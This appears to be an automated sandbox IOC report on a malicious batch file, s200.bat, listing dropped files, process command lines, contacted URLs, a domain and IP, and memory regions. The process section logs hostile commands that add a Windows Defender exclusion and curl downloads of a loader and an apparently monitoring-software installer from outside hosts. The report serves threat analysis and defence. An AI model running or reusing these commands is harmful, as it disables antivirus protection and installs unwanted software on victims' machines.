IOC Report
s200.bat

loading gif

Files

File Path
Type
Category
Malicious
s200.bat
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4cp5ps3t.shx.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_axkxejqb.tu4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dbxfodlu.dez.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lovrshse.50o.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mg4evzoh.yqm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcjtcfrh.udr.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ti1wvsf0.eas.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xleo42uf.wfb.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\s200\l
ASCII text, with no line terminators
modified
C:\Users\user\AppData\Local\Temp\s200\stld2.tmp
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\s200\stld3.tmp
ASCII text, with CRLF line terminators
dropped
\Device\ConDrv
ASCII text, with CR, LF line terminators
dropped
\Device\Null
ASCII text, with CRLF line terminators
dropped
There are 5 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\s200.bat" "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\s200'"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Remove-MpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\s200'"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\reg.exe
reg query "HKU\S-1-5-19\Environment"
C:\Windows\System32\curl.exe
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\s200\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk
C:\Windows\System32\curl.exe
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\s200\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
C:\Windows\System32\timeout.exe
timeout 10
C:\Windows\System32\curl.exe
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\s200\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
C:\Windows\System32\timeout.exe
timeout 10
C:\Windows\System32\curl.exe
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\s200\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://swtb-download.spyrix-sfk.com/d
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe77
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeWinsta0
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe:
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=C:
unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfksock.dll
unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfk
167.114.14.170
https://cdnbaynet.com/loader/link.php?prg_id=sfkY
unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfkcurl.exe
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeHy
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeF
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.execurl.exe
unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfkWinsta0
unknown
There are 4 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
cdnbaynet.com
167.114.14.170

IPs

IP
Domain
Country
Malicious
167.114.14.170
cdnbaynet.com
Canada
127.0.0.1
unknown
unknown

Memdumps

Base Address
Regiontype
Protect
Malicious
979C8FE000
stack
page read and write
5B3D0FD000
stack
page read and write
1C551990000
heap
page read and write
242373D0000
heap
page read and write
24237760000
heap
page read and write
242373E0000
heap
page read and write
1EB327B0000
heap
page read and write
1C551A90000
heap
page read and write
1EB32886000
heap
page read and write
1EB32883000
heap
page read and write
1EB32907000
heap
page read and write
1C586F50000
heap
page read and write
1C586D88000
heap
page read and write
223A8400000
heap
page read and write
1EB328AA000
heap
page read and write
979C87C000
stack
page read and write
242375D0000
heap
page read and write
1EB32881000
heap
page read and write
134DDF50000
heap
page read and write
184D2FF000
stack
page read and write
223A8480000
heap
page read and write
BDDD1AD000
stack
page read and write
1EB32790000
heap
page read and write
223A9EF4000
heap
page read and write
223A9EF0000
heap
page read and write
67714FF000
stack
page read and write
1EB328D4000
heap
page read and write
979C97E000
stack
page read and write
242375B0000
heap
page read and write
1C586D64000
heap
page read and write
242373E7000
heap
page read and write
184CF2D000
stack
page read and write
1C586D20000
heap
page read and write
1B7C5770000
heap
page read and write
1EB32882000
heap
page read and write
134DDF99000
heap
page read and write
1EB328C0000
heap
page read and write
24237400000
heap
page read and write
1EB3288D000
heap
page read and write
1C551B70000
heap
page read and write
1EB328BB000
heap
page read and write
134DDF90000
heap
page read and write
1EB327D0000
remote allocation
page read and write
67712FD000
stack
page read and write
134DDF70000
heap
page read and write
1EB32907000
heap
page read and write
1EB327D0000
remote allocation
page read and write
1B7C3BD0000
heap
page read and write
134DDFA3000
heap
page read and write
134DE140000
heap
page read and write
A75B2FF000
stack
page read and write
BDDD4FF000
stack
page read and write
1C586D80000
heap
page read and write
1C551DE0000
heap
page read and write
24237764000
heap
page read and write
134DE144000
heap
page read and write
1EB328ED000
heap
page read and write
5B3D2FE000
stack
page read and write
5B3D1FE000
stack
page read and write
1C551A70000
heap
page read and write
67713FF000
stack
page read and write
1EB328BD000
heap
page read and write
1EB3288E000
heap
page read and write
5DE9FBD000
stack
page read and write
1B7C5590000
heap
page read and write
1EB3288D000
heap
page read and write
A75B27F000
stack
page read and write
1EB328ED000
heap
page read and write
1EB32886000
heap
page read and write
1B7C3C10000
heap
page read and write
1B7C3BE0000
heap
page read and write
1EB32870000
heap
page read and write
134DDFAE000
heap
page read and write
223A83B0000
heap
page read and write
1EB328ED000
heap
page read and write
1B7C5774000
heap
page read and write
1EB32878000
heap
page read and write
1C586D60000
heap
page read and write
184D3FF000
stack
page read and write
5DEA27E000
stack
page read and write
1C551B78000
heap
page read and write
1EB32830000
heap
page read and write
1EB328AA000
heap
page read and write
A75AFAC000
stack
page read and write
1C551DE5000
heap
page read and write
1EB328AA000
heap
page read and write
223A83C0000
heap
page read and write
BDDD5FF000
stack
page read and write
1B7C3C18000
heap
page read and write
223A8488000
heap
page read and write
1EB3288D000
heap
page read and write
1EB328AA000
heap
page read and write
1EB328B3000
heap
page read and write
134DDE70000
heap
page read and write
1EB3288D000
heap
page read and write
1EB32907000
heap
page read and write
1EB328D4000
heap
page read and write
1EB327D0000
remote allocation
page read and write
1C586D30000
heap
page read and write
5DEA2FE000
stack
page read and write
1EB326B0000
heap
page read and write
There are 91 hidden memdumps, click here to show them.